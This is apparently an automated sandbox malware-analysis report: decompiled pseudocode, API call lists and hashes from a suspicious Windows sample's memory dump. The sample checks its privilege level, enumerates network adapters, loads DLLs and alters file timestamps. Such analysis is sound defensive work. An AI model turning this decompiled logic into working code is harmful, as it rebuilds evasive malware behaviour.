0x005c3b0f
0x005c3b15
0x005c3b1b
0x005c3b1e
0x005c3b1e
0x005c3b2b

APIs

GetCurrentProcess.KERNEL32 ref: 005C3AA9
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 005C3AB3
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 005C3ACF
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C3AEE
EqualSid.ADVAPI32(?), ref: 005C3AFF
FreeSid.ADVAPI32(00000000), ref: 005C3B0F
CloseHandle.KERNELBASE(?), ref: 005C3B1E

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: ProcessToken$AllocateCloseCurrentEqualFreeHandleInformationInitializeOpen
String ID:
API String ID: 3347031116-0
Opcode ID: 007636e409723d342e6ab4350af66615421bd9ed270c52b38df51125a944a3ee
Instruction ID: 221f94ad6418038cff7061ea11fa03564278722e51368dd2f1f348ec03151e8b
Opcode Fuzzy Hash: 007636e409723d342e6ab4350af66615421bd9ed270c52b38df51125a944a3ee
Instruction Fuzzy Hash: DC110A71205311ABD7209F65DC49E5BBFECFB54B45F00881EB885D6190D670D908DB92

Uniqueness

Uniqueness Score: -1.00%

Function 005D6780, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E005D6780(void* __ecx) {
				intOrPtr _t16;
				intOrPtr _t17;
				void* _t22;
				void* _t24;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				void* _t56;
				intOrPtr* _t57;

				_t16 =  *0x5d9a88; // 0x282c70
				_t36 = 0;
				 *((intOrPtr*)(_t53 + 8)) = 0x280;
				 *_t53 = 0;
				 *((intOrPtr*)(_t53 + 4)) = 0;
				if(_t16 != 0) {
					E005C91E0(_t16);
					_t53 = _t53 + 4;
					 *0x5d9a88 = 0;
				}
				_t17 = E005C3180(0x280, 0);
				_t54 = _t53 + 8;
				_t49 = _t17;
				if(_t17 == 0) {
					_t45 = _t49;
					_t49 = 0;
					goto L14;
				} else {
					_t37 = _t54 + 8;
					_t22 =  *0x5d9f0c(_t49, _t37); // executed
					if(_t22 != 0x6f) {
						_t46 = _t49;
						L8:
						 *((intOrPtr*)(_t54 + 0xc)) = _t46;
						_t6 = _t46 + 8; // 0x8
						_push(0x800c);
						_push(_t54 + 4);
						_push(_t54);
						_push(0x194);
						_t24 = E005CF800();
						_t36 = 0;
						if(_t24 == 0) {
							L18:
							return _t36;
						}
						_t27 = E005C3180(2 +  *(_t54 + 4) * 4, 0);
						_t56 = _t54 + 8;
						 *0x5d9a88 = _t27;
						if(_t27 == 0) {
							goto L18;
						}
						_t38 = _t56 + 0x10;
						E005D4520(_t56 + 0x10, 0x9c);
						_t57 = _t56 + 8;
						_t52 = 0xffffffe0;
						_t48 = 0;
						do {
							_t42 =  *0x5d9a88; // 0x282c70
							E005D68E0(_t42 + _t48, 0x100, _t38,  *( *_t57 + _t52 + 0x20) & 0x000000ff);
							_t57 = _t57 + 0x10;
							_t48 = _t48 + 4;
							_t52 = _t52 + 1;
						} while (_t52 != 0);
						_t32 =  *0x5d9a88; // 0x282c70
						_t45 =  *((intOrPtr*)(_t57 + 0xc));
						_t36 = 1;
						 *((short*)(_t32 + 0x80)) = 0;
						L14:
						_t18 =  *_t54;
						if( *_t54 != 0) {
							E005C91E0(_t18);
							_t54 = _t54 + 4;
						}
						if(_t45 != 0) {
							E005C91E0(_t49);
						}
						goto L18;
					}
					_t33 = E005C3180( *((intOrPtr*)(_t54 + 0xc)), _t49);
					_t54 = _t54 + 8;
					_t45 = _t33;
					if(_t33 == 0) {
						_t49 = 0;
						_t36 = 0;
						goto L14;
					}
					 *0x5d9f0c(_t45, _t37);
					_t49 = _t45;
					goto L8;
				}
			}

0x005d678a
0x005d678f
0x005d6793
0x005d679b
0x005d679e
0x005d67a4
0x005d67a7
0x005d67ac
0x005d67af
0x005d67af
0x005d67c0
0x005d67c5
0x005d67c8
0x005d67cc
0x005d6802
0x005d6804
0x00000000
0x005d67ce
0x005d67ce
0x005d67d4
0x005d67dd
0x005d680b
0x005d680d
0x005d6810
0x005d6814
0x005d681f
0x005d6824
0x005d6825
0x005d6826
0x005d682c
0x005d6831
0x005d6835
0x005d68d1
0x005d68dd
0x005d68dd
0x005d6849
0x005d684e
0x005d6853
0x005d6858
0x00000000
0x00000000
0x005d685a
0x005d6864
0x005d6869
0x005d686c
0x005d6871
0x005d6873
0x005d6876
0x005d688b
0x005d6890
0x005d6893
0x005d6896
0x005d6896
0x005d6899
0x005d689e
0x005d68a4
0x005d68a5
0x005d68b4
0x005d68b4
0x005d68b9
0x005d68bc
0x005d68c1
0x005d68c1
0x005d68c6
0x005d68c9
0x005d68ce
0x00000000
0x005d68c6
0x005d67e4
0x005d67e9
0x005d67ec
0x005d67f0
0x005d68b0
0x005d68b2
0x00000000
0x005d68b2
0x005d67f8
0x005d67fe
0x00000000
0x005d67fe

APIs

GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 005D67D4
GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 005D67F8

Part of subcall function 005C91E0: RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1

Strings

p,(, xrefs: 005D678A, 005D67AF, 005D6853, 005D6876, 005D6899

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: AdaptersInfo$FreeHeap
String ID: p,(
API String ID: 1341788161-2805232150
Opcode ID: a8977a800d28c782fbc4b24704f5d12a0a9f803390b27664f663fda3a9c4ed15
Instruction ID: fe94079ddba525a76277085015964c51de726f10e1fe2b29392987ebc68cd0e5
Opcode Fuzzy Hash: a8977a800d28c782fbc4b24704f5d12a0a9f803390b27664f663fda3a9c4ed15
Instruction Fuzzy Hash: 6431A4B19043056FE7219B68AC8AF977BD8BF80344F15443FF84887341EA70D909D762

Uniqueness

Uniqueness Score: -1.00%

Function 005C2DA0, Relevance: 3.1, APIs: 2, Instructions: 56
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 34%

			E005C2DA0() {
				void* _t3;
				void* _t6;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t13;
				void* _t14;

				if( *0x5d9bb8 != 0) {
					L2:
					if((GetVersion() & 0x000000fe) > 5) {
						_push(0x5d9aa8);
						_push(0x5d9b30);
						_push(1);
						_push(0);
						_push(0x5d9c0c); // executed
					} else {
						_push(0x5d9bf4);
						_push(0x5d9bd8);
						_push(1);
						_push(0);
						_push(0x5d9afc);
					}
					_t3 =  *0x5d9df0(); // executed
					_t13 = _t3;
					if(_t3 < 0) {
						_t12 = _t14;
						E005D4520(_t14, 0x30);
						E005D68E0( *0x5d9bb8, 0x200, _t12, _t13);
						_t6 = 0;
						_t10 = 0xffffffffffffffff;
					} else {
						_t10 = 1;
						_t6 = 1;
					}
					 *0x5d9bf8 = _t10;
					return _t6;
				}
				_t7 = E005C3180(0x400, 0);
				_t14 = _t14 + 8;
				 *0x5d9bb8 = _t7;
				if(_t7 == 0) {
					return 0;
				}
				goto L2;
			}

0x005c2daf
0x005c2dcd
0x005c2ddb
0x005c2df2
0x005c2df7
0x005c2dfc
0x005c2dfe
0x005c2e00
0x005c2ddd
0x005c2ddd
0x005c2de2
0x005c2de7
0x005c2de9
0x005c2deb
0x005c2deb
0x005c2e05
0x005c2e0b
0x005c2e0f
0x005c2e18
0x005c2e1d
0x005c2e32
0x005c2e3a
0x005c2e3e
0x005c2e11
0x005c2e13
0x005c2e14
0x005c2e14
0x005c2e3f
0x00000000
0x005c2e3f
0x005c2db8
0x005c2dbd
0x005c2dc2
0x005c2dc7
0x00000000
0x005c2e4e
0x00000000

APIs

GetVersion.KERNEL32 ref: 005C2DCD
CoCreateInstance.OLE32(005D9C0C,00000000,00000001,005D9B30,005D9AA8), ref: 005C2E05

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

Part of subcall function 005D68E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000400), ref: 005D6A15

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Heap$AllocateByteCharCreateInstanceMultiProcessVersionWide
String ID:
API String ID: 2686302260-0
Opcode ID: 8df38b9135f17a425a438cfed16d69e7cec5063f2042957cdf8299fda2b694c9
Instruction ID: 06b727c65622c27e27585ef75ff39d59b622deaa640109c5e29df0192c37402a
Opcode Fuzzy Hash: 8df38b9135f17a425a438cfed16d69e7cec5063f2042957cdf8299fda2b694c9
Instruction Fuzzy Hash: 2901D4317D93013BF7302AA8BC8BFA53E54B760B06F16402FF506F52D1E5A18445E256

Uniqueness

Uniqueness Score: -1.00%

Function 005CC6D0, Relevance: 1.5, APIs: 1, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E005CC6D0(short* _a4) {
				struct _OBJDIR_INFORMATION _v12;
				short* _t8;
				long _t10;
				struct _EXCEPTION_RECORD _t12;
				UNICODE_STRING* _t14;
				struct _OBJDIR_INFORMATION _t15;
				HMODULE* _t16;
				short _t18;

				_t16 =  &_v12;
				_t8 = _a4;
				 *_t16 = 0;
				_t12 = 0;
				if( *_t8 != 0) {
					do {
						_t18 =  *((short*)(_t8 + _t12 + 2));
						_t12 = _t12 + 2;
					} while (_t18 != 0);
				}
				_t14 =  &_v12;
				_t15 = 0;
				 *_t14 = _t12;
				 *((short*)(_t14 + 2)) = _t12 + 2;
				 *((intOrPtr*)(_t14 + 4)) = _t8;
				_t10 = LdrLoadDll(0, 0, _t14, _t16); // executed
				if(_t10 >= 0) {
					_t15 =  *_t16;
				}
				return _t15;
			}

0x005cc6d1
0x005cc6d4
0x005cc6d8
0x005cc6df
0x005cc6e5
0x005cc6e7
0x005cc6e7
0x005cc6ed
0x005cc6ed
0x005cc6e7
0x005cc6f2
0x005cc6f6
0x005cc6f8
0x005cc6fe
0x005cc702
0x005cc70b
0x005cc713
0x005cc715
0x005cc715
0x005cc71e

APIs

LdrLoadDll.NTDLL(00000000,00000000,?), ref: 005CC70B

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2d4157f9cc6a385c7c92e2edb5a3eb94b38f14ad0fd97cb5411901b4d5e73740
Instruction ID: 93c3ccf0c53adbc35e1128f3122d2fa59ef7761205321d98d7b644b46b84d6a4
Opcode Fuzzy Hash: 2d4157f9cc6a385c7c92e2edb5a3eb94b38f14ad0fd97cb5411901b4d5e73740
Instruction Fuzzy Hash: 14F082705042208FD324AF18D906B97FBF8FF45710F06C54DE4888B250E7759885CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 005C3200, Relevance: 29.1, APIs: 19, Instructions: 566
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E005C3200(signed int _a4, signed int _a8, signed int _a12) {
				void* _v16;
				void* _v20;
				char _v600;
				char _v612;
				char _v716;
				char _v764;
				struct _SECURITY_ATTRIBUTES* _v768;
				struct _SECURITY_ATTRIBUTES* _v772;
				signed int _v776;
				struct _SECURITY_ATTRIBUTES* _v780;
				struct _SECURITY_ATTRIBUTES* _v784;
				struct _SECURITY_ATTRIBUTES* _v788;
				struct _SECURITY_ATTRIBUTES* _v792;
				struct _SECURITY_ATTRIBUTES* _v796;
				struct _SECURITY_ATTRIBUTES* _v800;
				struct _SECURITY_ATTRIBUTES* _v804;
				struct _SECURITY_ATTRIBUTES* _v808;
				char _v812;
				struct _SECURITY_ATTRIBUTES* _v816;
				char _v820;
				WCHAR* _v824;
				char _v828;
				char _v832;
				intOrPtr _v912;
				char _v916;
				intOrPtr _v920;
				char _v924;
				signed int _v928;
				char _v932;
				long _v936;
				long _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				void* _v956;
				intOrPtr _v960;
				struct _SECURITY_ATTRIBUTES* _v968;
				signed int _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				WCHAR* _v984;
				char _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				char _v1004;
				intOrPtr _v1008;
				struct _SECURITY_ATTRIBUTES* _v1012;
				intOrPtr _v1016;
				intOrPtr* _v1020;
				signed int _v1024;
				char _v1028;
				intOrPtr _v1032;
				signed int _v1036;
				short _v1040;
				intOrPtr _v1044;
				char _v1048;
				intOrPtr _v1052;
				char _v1056;
				signed int _v1060;
				WCHAR* _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				signed int _v1080;
				char _v1084;
				long _v1088;
				signed int _v1092;
				intOrPtr _v1096;
				signed int _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				WCHAR* _v1112;
				intOrPtr _v1116;
				FILETIME* _v1120;
				void* _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				signed int* _v1140;
				char _v1144;
				char _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				signed int _v1164;
				FILETIME* _v1168;
				void* _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				signed int* _v1188;
				signed int _v1192;
				WCHAR* _v1196;
				intOrPtr _v1200;
				WCHAR* _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr* _v1216;
				intOrPtr* _v1224;
				char _v1228;
				signed int* _v1292;
				signed int* _v1296;
				intOrPtr _v1300;
				signed int _v1308;
				intOrPtr* _t281;
				signed int _t288;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t298;
				signed int _t299;
				void* _t300;
				signed int _t302;
				signed int _t314;
				void* _t315;
				signed int _t318;
				long _t325;
				long _t328;
				intOrPtr* _t333;
				intOrPtr _t335;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				signed int _t349;
				signed int _t353;
				intOrPtr* _t369;
				void* _t371;
				signed int _t372;
				signed int _t374;
				signed int _t386;
				signed int _t387;
				signed int _t391;
				signed int _t392;
				signed int _t397;
				signed int _t398;
				signed int _t402;
				signed int _t403;
				void* _t410;
				void* _t412;
				signed int _t413;
				signed int _t415;
				signed int _t416;
				FILETIME* _t419;
				char* _t424;
				char* _t425;
				signed int _t426;
				FILETIME* _t441;
				signed int* _t464;
				signed int _t471;
				signed int _t472;
				signed int* _t473;
				intOrPtr* _t477;
				void* _t487;
				char* _t489;
				intOrPtr* _t491;
				intOrPtr* _t492;
				FILETIME* _t494;
				signed int _t497;
				signed int _t498;
				intOrPtr* _t499;
				signed int _t500;
				void* _t501;
				signed int _t503;
				intOrPtr* _t506;
				void* _t508;
				signed int* _t511;
				char* _t512;
				void* _t513;
				signed int _t514;
				signed int _t518;
				void* _t520;
				void* _t521;
				void* _t522;
				void* _t525;
				void* _t527;
				void* _t532;

				if( *0x5d9aa8 != 0) {
					_t514 = _t518;
					_t520 = (_t518 & 0xfffffff8) - 0x3f0;
					_t281 =  *0x5d9aa8; // 0x628c60
					_v1012 = 0;
					_v956 = 0;
					_v968 = 0;
					_v812 = 0;
					_v816 = 0;
					_v820 = 0;
					_v824 = 0;
					_v764 = 0;
					_v768 = 0;
					_v772 = 0;
					_v776 = 0;
					_v780 = 0;
					_v784 = 0;
					_v788 = 0;
					_v792 = 0;
					_v796 = 0;
					_v800 = 0;
					_v804 = 0;
					_v808 = 0;
					_v1020 = _t281;
					_v1016 =  *_t281;
					_v988 = _v764;
					_v972 = _v776;
					_v992 = _v784;
					_v976 = _v792;
					_v996 = _v796;
					_v1000 = _v800;
					_v980 = _v808;
					_v1004 = _v812;
					_v1008 = _v816;
					_v984 = _v824;
					_t288 =  *((intOrPtr*)(_v1016 + 0x28))(_v1020, _v984, _v820, _v1008, _v1004, _v980, _v804, _v1000, _v996, _v976, _v788, _v992, _v780, _v972, _v772, _v768, _v988, _t501, _t487, _t410, _t513);
					__eflags = _t288;
					if(_t288 < 0) {
						_t503 = _t288;
						_t489 =  &_v600;
						_push(0x91);
						goto L29;
					} else {
						_t298 =  *0x5d9aa8; // 0x628c60
						_t299 =  *((intOrPtr*)( *_t298 + 0x1c))(_t298, 0,  &_v1080);
						__eflags = _t299;
						if(_t299 < 0) {
							_t503 = _t299;
							_t489 =  &_v612;
							_push(0x90);
							L29:
							_push(_t489);
							E005D4520();
							_t521 = _t520 + 8;
							_push(_t503);
							_push(_t489);
							goto L30;
						} else {
							_t505 = _a4;
							_t300 = E005C3240(_v1092, _a4, 0);
							_t522 = _t520 + 0xc;
							__eflags = _t300 - 0x3ff;
							if(_t300 > 0x3ff) {
								_t412 = 0;
								__eflags = 0;
								 *0x5d9bf8 = 3;
								goto L33;
							} else {
								_t302 = E005C26D0( &_v1048, 1, _t505);
								_t525 = _t522 + 0xc;
								__eflags = _t302;
								if(_t302 == 0) {
									_push(0x92);
									goto L42;
								} else {
									_t506 =  &_v612;
									E005D4520(_t506, 0x21);
									E005D4520( &_v812, 0x20);
									_t527 = _t525 + 0x10;
									_t415 =  *0x5d9de0;
									_t491 =  &_v832;
									_v1100 = _v1092;
									 *_t415(_t491);
									_v916 =  *((intOrPtr*)(_t491 + 8));
									_t492 =  &_v956;
									_v912 =  *((intOrPtr*)(_t491 + 0xc));
									_v924 =  *_t491;
									_v920 =  *((intOrPtr*)(_t491 + 4));
									 *_t415(_t492);
									_v1040 = 8;
									_v932 =  *((intOrPtr*)(_t492 + 0xc));
									_v940 =  *((intOrPtr*)(_t492 + 4));
									_v936 =  *(_t492 + 8);
									_v944 =  *_t492;
									_t314 =  *0x5d9dd4(_t506);
									__eflags = _t314;
									_v1036 = _t314;
									if(_t314 == 0) {
										L66:
										asm("int3");
										asm("int3");
										_push(_t514);
										_push(_t415);
										_push(_t492);
										_push(_t506);
										_t416 = 0;
										_t315 = CreateFileW(_v1112, 0x100, 1, 0, 3, 0, 0);
										__eflags = _t315 - 0xffffffff;
										if(_t315 != 0xffffffff) {
											_t471 = _a4;
											_t441 = 0;
											_t508 = _t315;
											_t494 = 0;
											__eflags = _t471;
											if(_t471 != 0) {
												_t494 =  &_v1148;
												_t328 = 0x989680 *  *_t471 + 0xd53e8000;
												__eflags = _t328;
												asm("adc edx, ebx");
												_t494->dwLowDateTime = _t328;
												_t494->dwHighDateTime = 0x989680 *  *_t471 >> 0x20;
											}
											_t472 = _a8;
											__eflags = _t472;
											if(_t472 != 0) {
												_t441 =  &_v1156;
												_t325 = 0x989680 *  *_t472 + 0xd53e8000;
												__eflags = _t325;
												asm("adc edx, ebx");
												_t441->dwLowDateTime = _t325;
												_t441->dwHighDateTime = 0x989680 *  *_t472 >> 0x20;
											}
											__eflags = _a12;
											if(_a12 == 0) {
												_t419 = 0;
												__eflags = 0;
											} else {
												_t473 = _a12;
												_v1168 = _t441;
												_v1172 = _t508;
												_t419 =  &_v1164;
												_t441 = _v1168;
												asm("adc edx, edi");
												_t508 = _v1172;
												_t419->dwLowDateTime = 0x989680 *  *_t473 + 0xd53e8000;
												_t419->dwHighDateTime = 0x989680 *  *_t473 >> 0x20;
											}
											_t318 = SetFileTime(_t508, _t494, _t441, _t419);
											__eflags = _t318;
											_t279 = _t318 != 0;
											__eflags = _t279;
											_t416 = 0 | _t279;
											CloseHandle(_t508);
										}
										return _t416;
									} else {
										_t415 = _v1060;
										_v968 = _v1032;
										_v976 = _v1040;
										_v972 = _v1036;
										_v980 = _v1044;
										_t333 = E005C5140(0xc);
										_t527 = _t527 + 4;
										_t506 = _t333;
										 *((intOrPtr*)(_t506 + 4)) = 0;
										 *(_t506 + 8) = 1;
										_t335 =  *0x5d9dd4(_t415);
										__eflags = _t415;
										 *_t506 = 0;
										if(_t415 == 0) {
											L11:
											_v1068 = _t335;
											_v1112 = _t506;
											_t336 = E005C5140(0xc);
											_t527 = _t527 + 4;
											 *(_t336 + 4) = 0;
											_t415 = _t336;
											 *(_t336 + 8) = 1;
											_t338 =  *0x5d9dd4( &_v828);
											__eflags = _t338;
											 *_t415 = _t338;
											if(__eflags == 0) {
												goto L66;
											} else {
												_t477 = _v1120;
												_v1076 =  *_t477;
												_v1108 = _v928;
												_v1060 = _v932;
												_v1088 = _v940;
												_v1092 = _v944;
												_v1096 = _v948;
												_v1080 = _v956;
												_v1100 = _v976;
												_v1104 = _v980;
												_v1084 = _v988;
												_v1064 = _v984;
												_t340 =  *((intOrPtr*)(_v1076 + 0x40))(_t477, _t338, _v1072, 6, _v1084, _v1064, _v1104, _v1100, _v1080, _v952, _v1096, _v1092, 5, _v1088, _v936, _v1060, _v1108,  &_v1056);
												asm("lock dec dword [ebx+0x8]");
												_t497 = _t340;
												_t511 = _v1188;
												if(__eflags == 0) {
													_t402 =  *_t415;
													__eflags = _t402;
													if(_t402 != 0) {
														 *0x5d9dd8(_t402);
														 *_t415 = 0;
													}
													_t403 =  *(_t415 + 4);
													__eflags = _t403;
													if(_t403 != 0) {
														L005D7400(_t403);
														_t527 = _t527 + 4;
													}
													L005D7400(_t415);
													_t527 = _t527 + 4;
												}
												asm("lock dec dword [esi+0x8]");
												_t424 =  &_v924;
												if(__eflags == 0) {
													_t397 =  *_t511;
													__eflags = _t397;
													if(_t397 != 0) {
														 *0x5d9dd8(_t397);
														 *_t511 = 0;
													}
													_t398 = _t511[1];
													__eflags = _t398;
													if(_t398 != 0) {
														L005D7400(_t398);
														_t527 = _t527 + 4;
													}
													L005D7400(_t511);
													_t527 = _t527 + 4;
												}
												_t506 =  *0x5d9ddc;
												 *_t506( &_v1124);
												 *_t506( &_v1048);
												 *_t506(_t424);
												__eflags = _t497;
												if(_t497 < 0) {
													__eflags = _t497 - 0x80070005;
													if(_t497 != 0x80070005) {
														_t512 =  &_v716;
														E005D4520( &_v716, 0x94);
														_t521 = _t527 + 8;
														_push(_t497);
														goto L63;
													} else {
														_t349 = E005C26D0( &_v1152, 0, _a4);
														_t525 = _t527 + 0xc;
														__eflags = _t349;
														if(_t349 == 0) {
															_push(0x93);
															L42:
															_push( *0x5d9bb8);
															E005D4520();
															_t522 = _t525 + 8;
															goto L31;
														} else {
															E005D4520( &_v916, 0x20);
															_v1204 = _v1196;
															_t353 =  *0x5d9de0;
															_t498 = _t353;
															 *_t353(_t424);
															_v1080 = _v928;
															_v1088 = _v936;
															_v1084 = _v932;
															_v1092 = _v940;
															 *_t498( &_v1060);
															_v1100 = _v1052;
															_v1108 = _v1060;
															_v1104 = _v1056;
															_v1112 = _v1064;
															 *_t498( &_v1144);
															_t415 = _v1164;
															_v1120 = _v1136;
															_v1128 = _v1144;
															_v1124 = _v1140;
															_v1132 = _v1148;
															_t369 = E005C5140(0xc);
															_t527 = _t525 + 0xc;
															_t492 = _t369;
															 *((intOrPtr*)(_t492 + 4)) = 0;
															 *(_t492 + 8) = 1;
															_t371 =  *0x5d9dd4(_t415);
															__eflags = _t415;
															_v1216 = _t492;
															 *_t492 = 0;
															if(_t415 == 0) {
																L47:
																_v1172 = _t371;
																_t372 = E005C5140(0xc);
																_t527 = _t527 + 4;
																 *(_t372 + 4) = 0;
																_t415 = _t372;
																 *(_t372 + 8) = 1;
																_t374 =  *0x5d9dd4( &_v932);
																__eflags = _t374;
																 *_t415 = _t374;
																if(__eflags == 0) {
																	goto L66;
																} else {
																	_t499 = _v1224;
																	_v1180 =  *_t499;
																	_v1212 = _v1096;
																	_v1164 = _v1100;
																	_v1192 = _v1108;
																	_v1196 = _v1112;
																	_v1200 = _v1116;
																	_v1184 = _v1124;
																	_v1168 = _v1120;
																	_v1204 = _v1128;
																	_v1208 = _v1132;
																	_v1188 = _v1140;
																	_v960 = _v1136;
																	_v1296 =  *((intOrPtr*)(_v1180 + 0x40))(_t499, _t374, _v1176, 6, _v1188, _v960, _v1208, _v1204, _v1184, _v1168, _v1200, _v1196, 3, _v1192, _v1104, _v1164, _v1212,  &_v1160);
																	asm("lock dec dword [ebx+0x8]");
																	if(__eflags == 0) {
																		_t391 =  *_t415;
																		__eflags = _t391;
																		if(_t391 != 0) {
																			 *0x5d9dd8(_t391);
																			 *_t415 = 0;
																		}
																		_t392 =  *(_t415 + 4);
																		__eflags = _t392;
																		if(_t392 != 0) {
																			L005D7400(_t392);
																			_t527 = _t527 + 4;
																		}
																		L005D7400(_t415);
																		_t527 = _t527 + 4;
																	}
																	_t464 = _v1292;
																	_t500 = _a4;
																	_t425 =  &_v1028;
																	asm("lock dec dword [ecx+0x8]");
																	if(__eflags == 0) {
																		_t386 =  *_t464;
																		__eflags = _t386;
																		if(_t386 != 0) {
																			 *0x5d9dd8(_t386);
																			_t464 = _v1296;
																			 *_t464 = 0;
																		}
																		_t387 = _t464[1];
																		__eflags = _t387;
																		if(_t387 != 0) {
																			L005D7400(_t387);
																			_t464 = _v1292;
																			_t527 = _t527 + 4;
																		}
																		L005D7400(_t464);
																		_t527 = _t527 + 4;
																	}
																	 *_t506( &_v1228);
																	 *_t506( &_v1152);
																	 *_t506(_t425);
																	_t426 = _v1308;
																	__eflags = _t426;
																	if(_t426 < 0) {
																		_t512 =  &_v820;
																		E005D4520( &_v820, 0x95);
																		_t521 = _t527 + 8;
																		_push(_t426);
																		L63:
																		_push(_t512);
																		L30:
																		_push(0x200);
																		_push( *0x5d9bb8);
																		E005D68E0();
																		_t522 = _t521 + 0x10;
																		L31:
																		_t412 = 0;
																		 *0x5d9bf8 = 2;
																		L33:
																		_t413 = _t412 + 1;
																		__eflags = _t413;
																	} else {
																		E005D4520( *0x5d9bb8, 0x65);
																		_t532 = _t527 + 8;
																		 *0x5d9bf8 = 3;
																		_t413 = 1;
																		goto L26;
																	}
																	goto L34;
																}
															} else {
																__eflags = 0;
																if(0 == 0) {
																	goto L66;
																} else {
																	goto L47;
																}
															}
														}
													}
												} else {
													E005D4520( *0x5d9bb8, 0x21);
													_t532 = _t527 + 8;
													__eflags =  *0x5d9ae8;
													_t500 = _a4;
													 *0x5d9bf8 = 3;
													_t151 =  *0x5d9ae8 != 0;
													__eflags = _t151;
													_t413 = 0 | _t151;
													L26:
													E005C3240(_v1300, _t500, 1);
													_t522 = _t532 + 0xc;
													L34:
													_t291 = _v1024;
													__eflags = _t291;
													if(_t291 != 0) {
														 *((intOrPtr*)( *_t291 + 8))(_t291);
													}
													_t292 = _v1080;
													__eflags = _t292;
													if(_t292 != 0) {
														 *((intOrPtr*)( *_t292 + 8))(_t292);
													}
													_t293 = _v1036;
													__eflags = _t293;
													if(_t293 != 0) {
														E005C91E0(_t293);
													}
													return _t413;
												}
											}
										} else {
											__eflags = 0;
											if(0 == 0) {
												goto L66;
											} else {
												goto L11;
											}
										}
									}
								}
							}
						}
					}
				} else {
					_t536 =  *0x5d9bf4;
					if( *0x5d9bf4 == 0) {
						E005D4520( *0x5d9bb8, 0x6b);
						__eflags = 0;
						 *0x5d9bf8 = 0;
						return 0;
					} else {
						_push(_a4);
						return E005CDF00(_t536);
					}
				}
			}

0x005c3207
0x005c6811
0x005c6819
0x005c681f
0x005c6826
0x005c682a
0x005c682e
0x005c6832
0x005c6839
0x005c6840
0x005c6847
0x005c684e
0x005c6855
0x005c685c
0x005c6863
0x005c686a
0x005c6871
0x005c6878
0x005c687f
0x005c6886
0x005c688d
0x005c6894
0x005c689b
0x005c68a4
0x005c68a8
0x005c68b3
0x005c68c5
0x005c68de
0x005c68e9
0x005c68fb
0x005c6906
0x005c6911
0x005c6923
0x005c692e
0x005c6939
0x005c697a
0x005c697d
0x005c697f
0x005c6cb0
0x005c6cb2
0x005c6cb9
0x00000000
0x005c6985
0x005c6985
0x005c6994
0x005c6997
0x005c6999
0x005c6cc0
0x005c6cc2
0x005c6cc9
0x005c6cce
0x005c6cce
0x005c6ccf
0x005c6cd4
0x005c6cd7
0x005c6cd8
0x00000000
